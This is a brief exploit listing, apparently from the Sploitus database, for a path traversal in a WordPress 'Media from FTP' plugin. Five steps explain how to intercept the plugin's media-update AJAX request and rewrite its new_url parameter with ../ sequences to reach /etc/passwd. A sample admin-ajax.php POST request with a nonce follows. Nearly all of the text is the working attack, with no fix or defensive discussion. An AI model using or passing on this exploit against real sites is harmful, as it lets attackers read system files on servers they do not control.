Share 
## https://sploitus.com/exploit?id=WPEX-ID:0D323B07-C6E7-4ABA-85BC-64659AD0C85D
1) Go to /wp-admin/admin.php?page=mediafromftp-search-register
2) Select any file from the media text list below
3) Click "Update Media"
4) Intercept request with action=mediafromftp-update-ajax-action
5) Change "new_url" by adding the following to the file path: /../../../../../../../../../../etc/passwd

POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1

action=mediafromftp-update-ajax-action&nonce=9c0c0115ee&maxcount=1&new_url=/etc/passwd&new_datetime=2023-07-10+20%3A53%3A36